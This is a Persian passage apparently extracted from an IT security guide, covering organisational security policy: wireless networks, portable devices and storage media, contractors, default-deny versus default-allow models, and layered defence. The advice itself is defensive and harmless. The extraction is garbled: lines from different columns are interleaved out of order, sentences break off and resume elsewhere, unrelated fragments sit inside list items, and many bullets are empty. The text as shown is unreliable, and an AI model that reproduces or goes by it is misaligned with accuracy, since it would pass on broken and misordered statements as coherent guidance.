‫ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺷﺎﻣﻞ ﺍﺭﺗﺒﺎﻃـﺎﺕ‪ ،‬ﺁﮔـﺎﻫﻲ‪ ،‬ﺁﻣـﻮﺯﺵ ﻭ‬
‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﻃﺮﺡ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ‪.‬‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﺤﻴﻂ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﻣﻲﺷﻨﺎﺳﻴﺪ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﻴﺎﺳﺖ ﺧﻮﺩ ﺭﺍ ﺗﺪﻭﻳﻦ ﻣـﻲﻧﻤﺎﻳﻴـﺪ‪ ،‬ﺑﺎﻳـﺪ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﺷﺒﻜﻪ ﻫﺎ‪ ،‬ﻛﺎﺭﻛﻨـﺎﻥ ﻭ‬
‫ﺭﺳﺎﻧﻪﻫﺎﻱ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻣﺤـﻴﻂ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ‬
‫ﻣﻲﺷﻨﺎﺳﻴﺪ ﻭ ﻫﻤﺔ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪﺍﻳﺪ‪ .‬ﺍﻳﻦ ﺷﻨﺎﺧﺖ‪ ،‬ﺁﻧﭽـﻪ‬
‫ﺑﺎﻋﺚ ﻧﮕﺮﺍﻧﻲ ﺷﻤﺎﺳﺖ ﺭﺍ ﺗﻌﺮﻳﻒ ﻣـﻲﻛﻨـﺪ‪ .‬ﻭﻗﺘـﻲ ﺳﻴﺎﺳـﺘﻬﺎ ﺭﺍ‬
‫ﺗﺪﻭﻳﻦ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻡ ﺁﻧﭽـﻪ ﻛـﻪ‬
‫ﺩﺭ ﻣﺤﻴﻂ ﺷﻤﺎﺳﺖ ﻭ ﻳﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﺤﻴﻂ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺑـﺎ‬
‫ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﺷﻤﺎ ﺗﻌﺎﻣﻞ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺭﺍ ﺍﺯ ﻗﻠﻢ ﻧﻴﺎﻧﺪﺍﺧﺘﻪﺍﻳـﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﮔﺬﺷﺘﻪ ﻣﺤﻴﻂ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﻫﻤﺎﻥ ﻣﺮﺯﻫﺎﻱ ﺑﻮﺟﻮﺩﺁﻣﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺩﻳﻮﺍﺭﻫـﺎ‬
‫ﻭ ﻧﺮﺩﻩﻫﺎ ﺗﻌﺮﻳﻒ ﻣﻲﻛﺮﺩﻧﺪ؛ ﺍﻣـﺎ ﺍﻣـﺮﻭﺯﻩ ﻣﺤﻴﻄﻬـﺎﻱ ﺳـﺎﺯﻣﺎﻧﻲ‬
‫‪١٥٣‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻣﺤﻮﻃﻪ ﺑﺒﺮﺩ‪ ،‬ﺑﺎ ﭼﻪ ﺭﻭﺷـﻬﺎﻳﻲ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﺤﺎﻓﻈﺖ ﻛﺮﺩ )ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ﺷﺎﻣﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻢ ﻣـﻲﺷـﻮﺩ( ﻭ‬
‫ﺍﮔﺮ ﺁﻥ ﺭﺳﺎﻧﻪ ﺩﺯﺩﻳﺪﻩ ﻳﺎ ﮔـﻢ ﺷـﻮﺩ ﭼـﻪ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﺑﺎﻳـﺪ‬
‫ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺑﻄﻮﺭ ﻣﺸﺮﻭﺡ ﺑﻴﺎﻥ ﺷـﻮﺩ‬
‫ﻼ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﭼﮕﻮﻧﻪ ﺑﺎﻳـﺪ‬
‫ﺭﺳﺎﻧﻪﺍﻱ ﻛﻪ ﻗﺒ ﹰ‬
‫ﺍﺯ ﺑـﻴﻦ ﺑـﺮﻭﺩ ﺗـﺎ ﺍﺣﺘﻤـﺎﻝ ﺧﻄﺮﻫـﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ ﺍﻓــﺸﺎﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻥ ﻛﺎﻫﺶ ﻳﺎﺑﺪ‪.‬‬
‫ﺑﻨﺪﺭﺕ ﺍﻳﻨﻘﺪﺭ ﺍﻳﺴﺘﺎ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻫﻨﮕﺎﻡ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺧﻮﺩ ﺑﺎﻳﺪ ﻧﻜﺎﺗﻲ ﻣﺜـﻞ ﻣـﻮﺍﺭﺩ ﺯﻳـﺮ ﺭﺍ‬
‫ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪:‬‬
‫•‬
‫•‬
‫ﻭ ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﺮﺍﻱ ﭘﺮﺳﺸﻬﺎﻱ ﺯﻳﺮ ﭘﺎﺳـﺨﻬﺎﻱ ﻣﻨﺎﺳـﺒﻲ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻴﺪ‪:‬‬
‫•‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻛﻪ ﺩﺭ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻣﻲﮔﻴﺮﻧﺪ ﻳﺎ ﺑـﻪ ﺗﺠﻬﻴـﺰﺍﺕ ﺳـﺎﻳﺖ ﻣﺘـﺼﻞ ﻣـﻲﺷـﻮﻧﺪ‪،‬‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘﺪﺍﺭ ﻳﺎ ﭘﺎﺭﻙ ﻛـﺮﺩﻥ‬
‫ﻳﻚ ﻣﺎﺷﻴﻦ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻥ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧـﺔ‬
‫ﻛﻴﻔﻲ ﺩﺭ ﺩﺍﺧﻞ ﻣﺎﺷﻴﻦ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ﻗـﺮﺍﺭ‬
‫ﺑﮕﻴﺮﻧﺪ‪ .‬ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳـﻴﻢ ﺑﺎﻳـﺪ ﻃـﻮﺭﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻭ‬
‫ﺣﻔﺎﻇﺖ ﺷﻮﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣـﺴﺎﺱ ﺁﻧﻬـﺎ ﺩﺭ ﺧـﺎﺭﺝ ﺍﺯ‬
‫ﺳﺎﻳﺖ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻧﺒﺎﺷﻨﺪ ﻭ ﺍﺯ ﻭﺭﻭﺩ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ‬
‫ﻣﺨﺮﺏ ﻣﻬﺎﺟﻤﻴﻦ ﺑﻪ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﮔﺮﺩﺩ‪.‬‬
‫ﻛﺪﺍﻡ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻪ ﻛﺴﺎﻧﻲ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ ﻛـﻪ ‪PDA‬ﻫـﺎ ﻭ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻣﻼﻗﺎﺗﻬـﺎ ﻭ ﻳـﺎ ﺻـﺮﻓﹰﺎ ﺩﺭ‬
‫ﺑﺎﺯﺩﻳﺪﻫﺎ ﺑﻪ ﻣﺤﻞ ﻛﺎﺭ ﻣﻲﺁﻭﺭﻧﺪ؟ ﺿﻮﺍﺑﻂ ﺍﺗﺼﺎﻝ ﺁﻧﻬﺎ ﺑـﻪ‬
‫ﺷﺒﻜﻪﻫﺎ‪ ،‬ﺧﻄﻮﻁ ﺗﻠﻔﻦ‪ ،‬ﭼﺎﭘﮕﺮﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺤﻞ‬
‫ﻛﺎﺭ ﭼﻴﺴﺘﻨﺪ؟‬
‫•‬
‫ﭼﻪ ﻣﻼﺣﻈﺎﺗﻲ ﺑﺮﺍﻱ ﺣﻤﻞ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻳﺎ ﺗﺠﻬﻴﺰﺍﺕ ﺫﺧﻴـﺮﺓ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﻣﺤﻞ ﻛﺎﺭ )ﻣﺜ ﹰﻼ ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮﺍﺕ( ﺍﺗﺨﺎﺫ‬
‫ﺷﺪﻩ ﺍﺳﺖ؟ ﺍﮔﺮ ﺭﻭﻱ ﺩﻳﺴﻜﻬﺎ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﭼﻪ ﺧﻮﺍﻫﺪ ﺷﺪ؟ ﺩﺭ ﻣﻮﺭﺩ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺟﺎﺭﻩﺍﻱ‬
‫ﻛﻪ ﻣﺠﺪﺩﹰﺍ ﺑﻪ ﺻﺎﺣﺒﺎﻧﺸﺎﻥ ﻋـﻮﺩﺕ ﺩﺍﺩﻩ ﻣـﻲﺷـﻮﻧﺪ ﭼـﻪ‬
‫ﺭﺍﻫﺒﺮﺩﻱ ﺍﺗﺨﺎﺫ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫•‬
‫ﺭﺍﻳﺎﻧﻪ ﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻣﻨﺎﺯﻝ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ ﻣﻌـﺮﺽ ﺧﻄـﺮ‬
‫ﻧﻔﻮﺫ‪ ،‬ﺩﺯﺩﻱ‪ ،‬ﻭ ﻭﺭﻭﺩ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨـﺮﺏ ﺑﺎﺷـﻨﺪ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺮﺧﻼﻑ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺳـﺎﺯﻣﺎﻥ‬
‫ﻼ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳـﻚ ﺗﺠـﺎﺭﺕ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ )ﻣﺜ ﹰ‬
‫ﺍﮔﺮ ﺷﺮﻛﺎﻱ ﺗﺠـﺎﺭﻱ ﻳـﺎ ﭘﻴﻤﺎﻧﻜـﺎﺭﺍﻥ ﺑـﻪ ﻭﺳـﺎﻳﻞ ﺷـﻤﺎ‬
‫ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ‪ -‬ﺧﻮﺍﻩ ﺩﺭ ﻣﺤـﻞ ﻛـﺎﺭ ﺷـﻤﺎ ﻳـﺎ‬
‫ﻣﺤﻞ ﻛﺎﺭ ﺧﻮﺩﺷﺎﻥ ‪ -‬ﭼﻪ ﻛـﺴﻲ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺣﻔﺎﻇـﺖ‬
‫ﺧﻮﺍﻫﺪ ﻛـﺮﺩ؟ ﭼﮕﻮﻧـﻪ ﺍﺯ ﺍﺧـﺘﻼﻁ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﺩﺍﺩﻩﻫـﺎﻱ‬
‫ﺣﺴﺎﺱ ﺧﻮﺩ ﺑﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﻴﺪ؟‬
‫•‬
‫ﭼﻪ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺗﺤﺖ ﮔـﻮﺍﻫﻲ "ﺍﺳـﺮﺍﺭ‬
‫ﺗﺠﺎﺭﻱ" ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ؟‬
‫ﭼﻪ ﻛﺴﻲ ﻣﺴﺌﻮﻝ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺍﺳـﺖ ﻭ ﻛﺠـﺎ‬
‫ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ؟‬
‫•‬
‫ﭼﻪ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ ﺑـﺮ ﺗﺠﻬﻴـﺰﺍﺕ ﻏﻴﺮﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﭘـﺮﺩﺍﺯﺵ‬
‫ﺍﻃﻼﻋﺎﺕ ﺣﺎﻛﻢ ﻫﺴﺘﻨﺪ؟ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﭼـﻪ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ‬
‫ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﭼﺎﭘﮕﺮﻫــﺎ‪ ،‬ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﻛﭙــﻲ ﻭ‬
‫ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﻭﺭﻧﮕﺎﺭ ﺗﺪﻭﻳﻦ ﺷﺪﻩﺍﻧﺪ؟ )ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ‬
‫ﻣــﺴﺘﻘﻞ ﻭ ﻳــﺎ ﻣﻴﺰﺑــﺎﻧﻲ ﻳــﻚ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ﻭﺏ ﺑــﺎ ﻣﺤﺘﻮﻳــﺎﺕ‬
‫ﺳﺆﺍﻝ ﺑﺮﺍﻧﮕﻴـﺰ(‪ .‬ﺳﻴﺎﺳـﺖ ﺑﺎﻳـﺪ ﻣـﺸﺨﺺ ﻛﻨـﺪ ﻛـﻪ ﺍﻳـﻦ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ‪ ،‬ﺣﻔﺎﻇـﺖ ﻭ ﺑـﺎﺯﺑﻴﻨﻲ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫•‬
‫ﻻ ﻗﺎﺑﻞ ﺣﻤﻞ ﻭ ﻓـﺸﺮﺩﻩ ﺍﺳـﺖ‪.‬‬
‫ﺭﺳﺎﻧﺔ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺳﻮﺍﺑﻖ ﻣﺎﻟﻲ ﺷـﺮﻛﺖ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﻳﻚ ﺳﺎﻳﺖ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ ﺩﻳﺴﻚ ﻓـﺸﺮﺩﻩ ﻳـﺎ‬
‫‪ DVD‬ﺑﺮﻳﺰﺩ‪ ،‬ﺩﺭﺻـﻮﺭﺕ ﺩﺯﺩﻳـﺪﻩ ﻳـﺎ ﺟﺎﺑﺠـﺎ ﺷـﺪﻥ ﺁﻥ‬
‫ﺭﺳﺎﻧﻪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﺧﻮﺍﻫﺪ ﺍﻓﺘﺎﺩ؟ ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎﻳـﺪ ﻣـﺸﺨﺺ‬
‫ﻛﻨﻨﺪ ﻛﻪ ﭼﻪ ﻛﺴﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺭﺳﺎﻧﻪ ﺭﺍ ﺑـﻪ ﺑﻴـﺮﻭﻥ ﺍﺯ‬
‫ﺱ ﻛﺎﻏﺬﻱ ﻧﺴﺒﺖ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎ ﹺ‬
‫ﺍﻫﻤﻴﺖ ﻳﻜﺴﺎﻧﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ(‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫•‬
‫ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺍﺯ ﻣﻮﻗﻌﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﺧــﻮﺩ ﺩﻭﺭ ﻫــﺴﺘﻴﺪ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ‬
‫ﺣﻤﻞ ﻭ ‪PDA‬ﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﻣﺜﻞ ﺁﺩﺭﺳﻬﺎﻱ ‪ ،IP‬ﺷﻤﺎﺭﻩﻫﺎﻱ ﺗﻠﻔﻦ‬
‫ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻛﻨﻨﺪ‪ .‬ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ‬
‫ﻼ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺑﺎﻳﺪ ﺩﺍﺭﺍﻱ ﺍﻣﻨﻴﺖ ﺣﺪﺍﻗﻠﻲ ﺑﺎﺷـﻨﺪ؛ ﻣـﺜ ﹰ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﻳﺎ ﺣﺪﺍﻗﻞ ﻧﺸﺎﻧﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ‬
‫ﻓﻴﺰﻳﻜﻲ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺭﺍﺑﻄـﻪ ﺑـﺎ ﺧﻄـﺮﺍﺕ ﺩﺯﺩﻱ ﻭ‬
‫ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺁﮔﺎﻩ ﻭ ﺁﻣﻮﺯﺵﺩﻳﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪١٥٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻓﻜﺮ ﻛﺮﺩﻥ ﺑﻪ ﻫﻤﺔ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻗﺒﻞ ﺍﺯ ﻭﻗﻮﻉ ﻫﺮ ﻣﺸﻜﻠﻲ ﻛﻤﻚ‬
‫ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺍﺯ ﻭﻗﻮﻉ ﺁﻥ ﻣـﺸﻜﻞ ﺟﻠـﻮﮔﻴﺮﻱ ﻛـﺮﺩ‪ .‬ﺗﻬﻴـﺔ‬
‫ﻋﺒﺎﺭﺗﻬﺎﻱ ﺑﺎﻣﻌﻨﻲ ﺩﺭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻫﻤﻪ ﻛﻤـﻚ ﻣـﻲﻛﻨـﺪ‬
‫ﻧﮕﺮﺍﻧﻴﻬﺎ ﺭﺍ ﺑﻔﻬﻤﻨﺪ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺻـﺤﻴﺢ ﭘﻴـﺸﮕﻴﺮﻱ ﺭﺍ ﺑﻜـﺎﺭ‬
‫ﺑﻨﺪﻧﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﭘﺎﻳﻪ ﺍﺗﺨﺎﺫ ﻛﻨﻴﺪ‬
‫ﺍﺑﺘﺪﺍ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻃﺒﻖ ﻛﺪﺍﻡ ﺍﻟﮕﻮﻱ ﺯﻳﺮ ﻋﻤـﻞ ﻛﻨﻴـﺪ‪:‬‬
‫"ﻫﺮﭼﻪ ﺻﺮﺍﺣﺘﹰﺎ ﻣﻤﻨـﻮﻉ ﺍﻋـﻼﻡ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ ﻣﺠـﺎﺯ ﺍﺳـﺖ" ﻳـﺎ‬
‫"ﻫﺮﭼﻪ ﺻﺮﺍﺣﺘﹰﺎ ﻣﺠﺎﺯ ﺩﺍﻧﺴﺘﻪ ﻧﺸﺪﻩ ﺑﺎﺷﺪ ﻣﻤﻨﻮﻉ ﺍﺳـﺖ"‪ .‬ﺳـﭙﺲ‬
‫ﺑﺒﻴﻨﻴﺪ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﺭﺍ ﭼﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺗﻌﺮﻳـﻒ ﻛﻨﻴـﺪ‪ .‬ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻣﻮﺭﺩ ﺍﻭﻝ ﺑﺎ ﻳﻚ ﻣﺤﻴﻂ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺎﺯ ﺳﺎﺯﮔﺎﺭ ﺑﺎﺷﺪ‪ ،‬ﻣﺜﻞ ﻳﻚ‬
‫ﺩﺍﻧﺸﮕﺎﻩ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﻣﻮﺭﺩ ﺩﻭﻡ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﻳﻚ ﻣﺆﺳﺴﺔ ﺗﺠﺎﺭﻱ‬
‫ﻣﻨﺎﺳﺐ ﺍﺳﺖ‪ ،‬ﻣﺎﻧﻨﺪ ﻳﻚ ﺑﺎﻧﻚ‪.‬‬
‫ﻭﻗﺘﻲ ﺑـﺮﺍﻱ ﺳﻴﺎﺳـﺖ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣﻘﺎﺑﻠـﺔ ﺧـﻮﺩ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ‬
‫ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺩﺭ ﻳﻚ ﻻﻳﻪ ﻣﺘﻮﻗﻒ ﻧـﺸﻮﻳﺪ ﻭ ﺑـﺮﺍﻱ ﺩﻓـﺎﻉ ﺩﺭ ﺑﺮﺍﺑـﺮ‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻣﺨﺘﻠﻒ‪ ،‬ﭼﻨﺪ ﺳﻄﺢ ﺣﻔﺎﻇﺘﻲ ﻫﻤﭙﻮﺷﺎﻥ ﻭ ﻣﺴﺘﻘﻞ ﺑﻨـﺎ‬
‫ﻧﻤﺎﺋﻴﺪ‪ .‬ﺳﭙﺲ ﻧﻈﺎﺭﺕ ﻭ ﺑﺎﺯﺑﻴﻨﻲ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺁﻥ ﻣﺠﻤﻮﻋﻪ ﺑﻴﺎﻓﺰﺍﻳﻴﺪ‬
‫ﺗﺎ ﻣﻄﺌﻤﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﺗﺨﺎﺫﺷﺪﻩ‪ ،‬ﺩﺭ ﻋﻤﻞ ﻧﻴﺰ‬
‫ﻭﺍﻗﻌﹰﺎ ﺟﻮﺍﺏ ﻣﻲﺩﻫﺪ‪ .‬ﺍﺣﺘﻤﺎﻝ ﮔﺮﻳﺰ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺍﺯ ﺗﻨﻬـﺎ ﻳـﻚ‬
‫ﻼ ﺳـﻪ‬
‫ﻣﺠﻤﻮﻋﺔ ﺩﻓﺎﻋﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺯ ﺍﺣﺘﻤﺎﻝ ﮔﺮﻳـﺰﺵ ﺍﺯ ﻣـﺜ ﹰ‬
‫‪٨٢‬‬
‫ﻣﺮﺣﻠﺔ ﺩﻓﺎﻋﻲ ﺑﻌﻼﻭﺓ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﺧﻄﺎﺭ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﺿﻤﺎﻧﺖ ﺍﺟﺮﺍﻳﻲ‪ ،‬ﻭ ﺑﺎﺯﺑﻴﻨﻲﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫•‬
‫ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻣﺮﺗﺒﹰﺎ ﺑﺮﺭﺳﻲ‬
